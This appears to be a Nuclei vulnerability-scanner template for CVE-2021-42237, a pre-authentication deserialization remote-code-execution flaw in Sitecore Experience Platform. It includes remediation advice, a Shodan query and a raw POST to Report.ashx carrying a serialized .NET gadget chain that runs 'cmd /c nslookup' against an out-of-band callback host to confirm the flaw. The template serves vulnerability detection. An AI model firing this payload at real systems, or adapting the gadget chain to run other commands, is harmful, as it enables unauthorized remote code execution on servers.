id: CVE-2021-42237 info: name: Sitecore Experience Platform Pre-Auth RCE author: pdteam severity: critical description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. metadata: shodan-query: http.title:"SiteCore" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-42237 cwe-id: CWE-502 tags: rce,sitecore,deserialization,oast requests: - raw: - | POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml foo 2 <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"> mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Compare System.String System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Start System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Diagnostics.Process System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] System.Diagnostics.Process Start(System.String, System.String) System.Diagnostics.Process Start(System.String, System.String) 8 Int32 Compare(System.String, System.String) System.Int32 Compare(System.String, System.String) 8 2 /c nslookup {{interactsh-url}} cmd matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - type: word part: body words: - "System.ArgumentNullException"